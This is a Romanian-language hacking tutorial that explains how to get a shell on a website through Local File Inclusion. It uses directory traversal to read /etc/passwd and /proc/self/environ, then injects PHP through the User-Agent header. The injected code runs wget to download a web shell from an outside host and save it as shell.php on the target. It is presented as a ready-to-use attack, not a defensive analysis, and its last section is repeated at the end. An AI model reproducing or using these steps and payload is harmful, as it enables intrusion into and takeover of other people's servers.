>>>>>>>>>>>>>> Shell prin LFI - metoda proc/self/environ <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>>            Author : SirGod               <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>>           www.insecurity-ro.org          <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>>              www.h4cky0u.org             <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>>             sirgod08@gmail.com           <<<<<<<<<<<<<<<

1 - Introducere
2 - Descoperire LFI
3 - Verificam daca proc/self/environ e accesibil
4 - Injectare cod malitios
5 - Acces la shell
6 - Multumiri

>> 1 - Introducere

  In acestu tutorial va voi arata cum sa obtineti un shell pe un site folosindu-va de Local File Inclusion si
injectand cod malitios in proc/self/environ.Este un tutorial care explica totul pas cu pas.

>> 2 - Descoperire LFI

   - Acum sa gasim o un site vulnerabil la Local File Inclusion.Am gasit tinta,sa verificam
 
        www.website.com/view.php?page=contact.php

   - Acum sa inlocuim contact.php cu ../ si URL-ul va devenii
     
       www.website.com/view.php?page=../
      
     si avem o eroare.
    
       Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

     sanse mari sa avem o vulnerabilitate de tip Local File Inclusion.Sa trecem mai departe.
      
  - Sa verificam daca putem accesa etc/passwd ca sa vedem daca este vulnerabil la Local File Inclusion.Sa face un request :
       
       www.website.com/view.php?page=../../../etc/passwd

     avem o eroare si fisierul etc/passwd nu este inclus.
 
        Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
   
     urcam cateva directorii
   
        www.website.com/view.php?page=../../../../../etc/passwd
      
     am inclus cu succes fisierul etc/passwd.
   
     root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

>> 3 - Verificam daca proc/self/environ e accesibil

   - Acum sa vedem daca proc/self/environ este accesibil.O sa inlocuim etc/passwd cu proc/self/environ
   
         www.website.com/view.php?page=../../../../../proc/self/environ
      
       Daca primiti ceva de genul        
      
    DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80
   
        proc/self/environ este accesibil.Daca primiti o pagina alba,o eroare inseamna ca nu este accesibil sau sistemul de operare este FreeBSD.

>> 4 - Injectare cod malitios

   - Acum sa injectam codul nostru malitios in proc/self/environ.Cum putem face asta?Injectam codul in HTTP Header-ul User-Agent.
   Folositi addon-ul Tamper Data pentru Firefox pentru a schimba User-Agent-ul.Porniti Tamper Data si faceti un request la URL-ul :
   
     www.website.com/view.php?page=../../../../../proc/self/environ

         Alegeti Tamper si in campul User-Agent scrieti urmatorul cod :
   
       <?system('wget http://hack-bay.com/Shells/gny.txt -O shell.php');?>
      
   Apoi dati submit la request.
     
        Comanda noastra va fi executata(o sa descarce un shell txt de la adresa http://hack-bay.com/Shells/gny.txt si il va salva ca shell.php in
directorul site-ului) prin intermediul functiei system(),si shell-ul nostru va fi creat.Daca nu merge,incercati exec() pentru ca system() poate fi
restrictionat pe server din php.ini


>> 5 - Acces la shell

    - Acuma sa verificam daca codul nostru malitios a fost injectat cu succes.Sa vedem daca shell-ul este prezent.
   
      www.website.com/shell.php
 
           Shell-ul nostru este acolo.Injectia a fost efectuata cu succes.
      

>> 6 - Multumiri

   Multumiri membrilor www.insecurity-ro.org si www.h4cky0u.org .

http://milw0rm.com/papers/361

   Folositi addon-ul Tamper Data pentru Firefox pentru a schimba User-Agent-ul.Porniti Tamper Data si faceti un request la URL-ul :
   
     www.website.com/view.php?page=../../../../../proc/self/environ

         Alegeti Tamper si in campul User-Agent scrieti urmatorul cod :
   
       <?system('wget http://hack-bay.com/Shells/gny.txt -O shell.php');?>
     
   Apoi dati submit la request.